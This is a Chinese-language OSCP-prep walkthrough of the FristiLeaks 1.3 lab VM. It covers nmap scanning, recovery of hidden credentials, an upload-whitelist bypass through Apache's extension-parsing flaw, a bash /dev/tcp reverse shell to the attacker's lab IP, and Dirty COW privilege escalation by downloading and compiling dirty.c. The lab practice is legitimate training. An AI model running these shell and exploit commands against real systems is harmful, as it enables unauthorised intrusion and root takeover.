oscp备考，oscp系列——FristiLeaks_1.3靶场

oscp备考，oscp系列——FristiLeaks_1.3靶场

FristiLeaks_1.3难度为简单靶场

• 考察信息收集，有点ctf的味道，通过提示最后发现upload上传地点
• 使用Apache解析漏洞，绕过白名单限制
• 最后牛脏提权
  下载地址：

https://pan.quark.cn/s/26e1cb6958fc

nmap

主机发现

└─# nmap -sn 192.168.80.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-20 09:22 CST
Nmap scan report for 192.168.80.1
Host is up (0.00036s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.80.2
Host is up (0.00030s latency).
MAC Address: 00:50:56:E1:35:E6 (VMware)
Nmap scan report for 192.168.80.131
Host is up (0.00052s latency).
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.80.254
Host is up (0.00033s latency).
MAC Address: 00:50:56:FF:44:91 (VMware)
Nmap scan report for 192.168.80.129
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 25.04 seconds

端口扫描

进行了两次扫描，发现只有80端口

┌──(root㉿kali)-[/home/kali/桌面/nmap]
└─# nmap --min-rate 10000 -p- 192.168.80.131 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-20 09:25 CST
Nmap scan report for 192.168.80.131
Host is up (0.00085s latency).
Not shown: 65515 filtered tcp ports (no-response), 19 filtered tcp ports (host-prohibited)
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 23.66 seconds
                                                                                                                                                                                                                  
┌──(root㉿kali)-[/home/kali/桌面/nmap]
└─# nmap --min-rate 5000 -p- 192.168.80.131 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-20 09:28 CST
Nmap scan report for 192.168.80.131
Host is up (0.0014s latency).
Not shown: 65502 filtered tcp ports (no-response), 32 filtered tcp ports (host-prohibited)
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 36.53 seconds

详细端口扫描

└─# nmap -sV -sC -sT -O -p80 192.168.80.131 -oA fl1.3/detail
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-20 09:45 CST
Nmap scan report for 192.168.80.131
Host is up (0.0014s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
| http-robots.txt: 3 disallowed entries 
|_/cola /sisi /beer
| http-methods: 
|_  Potentially risky methods: TRACE
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|storage-misc|media device|webcam
Running (JUST GUESSING): Linux 2.6.X|3.X|4.X (97%), Drobo embedded (89%), Synology DiskStation Manager 5.X (89%), LG embedded (88%), Tandberg embedded (88%)
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/h:drobo:5n cpe:/a:synology:diskstation_manager:5.2
Aggressive OS guesses: Linux 2.6.32 - 3.10 (97%), Linux 2.6.32 - 3.13 (97%), Linux 2.6.39 (94%), Linux 2.6.32 - 3.5 (92%), Linux 3.2 (91%), Linux 3.2 - 3.16 (91%), Linux 3.2 - 3.8 (91%), Linux 2.6.32 (91%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.9 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.21 seconds

vuln扫描

└─# nmap --script=vuln -p80 192.168.80.131 -oA fl1.3/vuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-20 09:47 CST
Nmap scan report for 192.168.80.131
Host is up (0.00087s latency).

PORT   STATE SERVICE
80/tcp open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum: 
|   /robots.txt: Robots file
|   /icons/: Potentially interesting folder w/ directory listing
|_  /images/: Potentially interesting folder w/ directory listing
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 108.07 seconds

目录扫描

nmap和目录扫描，得到了

/robots.txt
/icons/
/images/

80

robots.txt

发现三个目录进去看看

Disallow: /cola
Disallow: /sisi
Disallow: /beer

得到了images文件夹有目录遍历，没什么用

其他两个指向和/cola一样

/icons 目录

进入看看，也是目录遍历，但是全是图片，没有什么东西

对他单独进行目录扫描试试，也全部都是图片

提示信息

发现不对，尝试小写：fristi，成功访问

文件上传漏洞

通过提示登录

进入之后，顺便尝试了一下弱口令和sql注入，发现没有
查看源码，发现有提示

TODO:
We need to clean this up for production. I left some junk in here to make testing easier.
- by eezeepz

iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl
S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw
B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f
m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ
Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb
DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd
jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU
12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5
uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1
04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq
i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg
tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws
30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl
3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK
ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q
mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34
rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe
EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH
AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk
CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR
U5ErkJggg==

base64解密，发现是图片

得到

keKkeKKeKKeKkEkkEk

通过这两个

eezeepz
keKkeKKeKKeKkEkkEk

猜测应该是账号和密码
成功登录

发现文件上传

文件上传

进行文件上传，发现是白名单

查看一下php版本和中间件

发现可以尝试：%00截断和Apache解析漏洞
%00截断

1. PHP版本小于5.3.4
2. php.ini中的magic_quotes_gpc设置为Off

Apache解析漏洞
 Apache 在1.x和2.x版本中存在解析漏洞
 例如如下地址格式：

www.xxxx.com/apache.php.bbb.aaa

Apache从右至左开始判断后缀，若aaa非可识别后缀，再判断bbb，直到找到可识别后缀为止，然后将该可识别后缀进解析，因此如上地址解析为访问apache.php文件

尝试%00截断漏洞，失败

尝试低Apache解析漏洞，成功

蚁剑连接+反弹shell

反弹shell

bash -c 'exec bash -i &>/dev/tcp/192.168.80.129/7777 <&1'

方法一，牛脏提权

查看内核版本

Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64

可以尝试牛脏提权

wget http://192.168.80.129/dirty.c
gcc -pthread dirty.c -o dirty -lcrypt
chmod 777 dirty
./dirty 123456

可以发现已经成了，直接使用su命令切换用户

bash-4.1$ su firefart
su firefart
Password: 123456

[firefart@localhost tmp]# id
id
uid=0(firefart) gid=0(root) groups=0(root)
[firefart@localhost tmp]#